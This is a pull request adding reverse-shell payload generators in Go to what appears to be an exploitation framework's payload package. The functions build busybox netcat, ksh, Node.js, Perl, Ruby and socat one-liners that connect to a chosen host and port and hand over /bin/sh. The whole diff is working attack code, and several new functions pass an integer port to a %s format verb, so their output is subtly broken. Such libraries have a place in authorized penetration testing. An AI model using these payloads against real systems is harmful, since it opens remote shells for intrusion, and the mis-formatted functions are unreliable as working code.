### PR TITLE
Add GTFOBins reverse payloads

### DIFF
--- a/payload/reverse.go
+++ b/payload/reverse.go
@@ -10,6 +10,15 @@ func ReverseShellBash(lhost string, lport int) string {
 	return fmt.Sprintf("bash -c 'bash &> /dev/tcp/%s/%d <&1'", lhost, lport)
 }
 
+func ReverseShellBusyboxNetcat(lhost string, lport int) string {
+	// busybox nc expects the command to end with the -e option (when in use)
+	return fmt.Sprintf("busybox nc %s %d -e /bin/sh", lhost, lport)
+}
+
+func ReverseShellKsh(lhost string, lport int) string {
+	return fmt.Sprintf("ksh -c 'ksh > /dev/tcp/%s/%d <&1'", lhost, lport)
+}
+
 func ReverseShellNetcatGaping(lhost string, lport int) string {
 	// busybox nc expects the command to end with the -e option (when in use)
 	return fmt.Sprintf("nc %s %d -e /bin/sh", lhost, lport)
@@ -54,6 +63,22 @@ func ReverseShellMkfifoOpenSSL(lhost string, lport int) string {
 
 	return fmt.Sprintf(`cd /tmp; mkfifo %s; sh -i < %s 2>&1 | openssl s_client -quiet -connect %s:%d > %s; rm %s;`, fifo, fifo,
 		lhost, lport, fifo, fifo)
+}
+
+func ReverseShellNodeJS(lhost string, lport int) string {
+	return fmt.Sprintf(`node -e 'sh = require("child_process").spawn("/bin/sh"); require("net").connect(%s, "%s", function () { this.pipe(sh.stdin); sh.stdout.pipe(this); sh.stderr.pipe(this); })'`, lport, lhost)
+}
+
+func ReverseShellPerl(lhost string, lport int) string {
+	return fmt.Sprintf(`perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh");};'`, lhost, lport)
+}
+
+func ReverseShellRuby(lhost string, lport int) string {
+	return fmt.Sprintf(`ruby -rsocket -e 'exit if fork;c=TCPSocket.new("%s",%s);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'`, lhost, lport)
+}
+
+func ReverseShellSocat(lhost string, lport int) string {
+	return fmt.Sprintf(`socat tcp-connect:%s:%s exec:/bin/sh`, lhost, lport)
 }
 
 // Generates a script that can be used to create a reverse shell via


### PR DESCRIPTION
This adds the NodeJS, Perl, Ruby, ksh, and socat payloads from the gtfobins project (with some modification). It's also the first steps to starting to figure out how to best break out payload logic.

This first set of payloads were the ones that allowed for direct inlining (ie not shelling out to python).